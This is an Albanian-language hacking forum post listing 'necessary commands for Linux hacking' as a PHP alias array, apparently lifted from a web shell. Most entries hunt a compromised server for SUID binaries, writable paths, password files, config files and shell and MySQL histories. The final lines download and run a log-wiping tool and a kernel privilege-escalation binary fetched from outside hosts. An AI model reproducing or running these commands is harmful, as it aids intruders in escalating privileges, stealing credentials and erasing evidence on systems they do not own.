• Përshëndetje Vizitor!

    Nëse ju shfaqet ky mesazh do të thotë se ju nuk jeni regjistruar akoma. Edhe pse nuk jeni regjistruar ju arrini të shihni pjesën me të madhe të seksioneve dhe diskutimeve të forumit, por akoma nuk gëzoni të drejten për të marrë pjesë në to dhe në avantazhet e të qënurit anëtar i këtij komuniteti. Ju lutem : REGJISTROHUNI që të dërgoni postime dhe mesazhe në Forum-Al.

    Regjistrohu !

Komanda Te Nevojshme Per Linux Hacking

r00t

Anëtar
Anëtar
Feb 8, 2009
Postime
642
Pikët
18
Vendndodhja
Monaco
Keto komanda jan baza per ata qe duan te perdorin linux per hacking ose per te mesuar
Code:
$aliases=array(
'user senza password'=>'cut -d: -f1,2,3 /etc/passwd | grep',
'cpuinfo'=>'cat /proc/version /proc/cpuinfo',
'open ports'=>'netstat -atup | grep IST',
'crea dir in /tmp con percorso /tmp/.bin'=>'mkdir /tmp/.bin; chmod 777 /tmp/.bin',
'processi'=>'ps aux',
'partizioni e punti di mount'=>'df -h',
'utilizzo memoria e processore'=>'top',
'utenti collegati al server'=>'w',
'grep di ricerca per i processi httpd'=>'ps aux | grep http',
'find suid files'=>'find / -type f -perm -04000 -ls',
'find suid files'=>'find / -type f -perm -04000 -ls',
'find suid files in current dir'=>'find . -type f -perm -04000 -ls',
'find sgid files'=>'find / -type f -perm -02000 -ls',
'find sgid files in current dir'=>'find . -type f -perm -02000 -ls',
'find config.inc.php files'=>'find / -type f -name config.inc.php',
'find config.inc.php files in current dir'=>'find . -type f -name config.inc.php',
'find config* files'=>'find / -type f -name "config*"',
'find config* files in current dir'=>'find . -type f -name "config*"',
'find all writable files'=>'find / -type f -perm -2 -ls',
'find all writable files in current dir'=>'find . -type f -perm -2 -ls',
'find all writable directories'=>'find /  -type d -perm -2 -ls',
'find all writable directories in current dir'=>'find . -type d -perm -2 -ls',
'find all writable directories and files'=>'find / -perm -2 -ls',
'find all writable directories and files in current dir'=>'find . -perm -2 -ls',
'find all service.pwd files'=>'find / -type f -name service.pwd',
'find service.pwd files in current dir'=>'find . -type f -name service.pwd',
'find all .htpasswd files'=>'find / -type f -name .htpasswd',
'find .htpasswd files in current dir'=>'find . -type f -name .htpasswd',
'find all .bash_history files'=>'find / -type f -name .bash_history',
'find .bash_history files in current dir'=>'find . -type f -name .bash_history',
'find all .mysql_history files'=>'find / -type f -name .mysql_history',
'find .mysql_history files in current dir'=>'find . -type f -name .mysql_history',
'find all .fetchmailrc files'=>'find / -type f -name .fetchmailrc',
'find .fetchmailrc files in current dir'=>'find . -type f -name .fetchmailrc',
'list file attributes on a Linux second extended file system'=>'lsattr -va',
'Mostra porte aperte METODO 2'=>'netstat -an | grep -i listen',
'Mostra porte aperte METODO 1'=>'netstat -atup | grep IST',
'Ultime connessioni'=>'lastlog',
'Suid bins'=>'find /bin /usr/bin /usr/local/bin /sbin /usr/sbin /usr/local/sbin -perm -4000 2> /dev/null',
'posso scrivere in /etc/ë'=>'find /etc/ -type f -perm -o+w 2> /dev/null',
'posso scaricareë'=>'which wget w3m lynx cUrl lwp-download fetch GET',
'cpuinfo'=>'cat /proc/version /proc/cpuinfo',
'posso compilareë (GCC)'=>'locate gcc',
'WIPELOGS'=>'wget http://www.packetstormsecurity.org/UNIX/penetration/log-wipers/zap2.c && gcc zap2.c -o zap2 && chmod +x zap2 && chmod 777 zap2; ./zap2',
'Kernel attack (Krad.c) PT1 (If wget installed)'=>'wget http://ftp.powernet.com.tr/supermail/debug/k3 && chmod +x k3 && chmod 777 k3',
'Kernel attack (Krad.c) PT2 (L1)'=>'./k3 1',
'Kernel attack (Krad.c) PT2 (L2)'=>'./k3 2',
'Kernel attack (Krad.c) PT2 (L3)'=>'./k3 3',
'Kernel attack (Krad.c) PT2 (L4)'=>'./k3 4',
'Kernel attack (Krad.c) PT2 (L5)'=>'./k3 5',
 
Top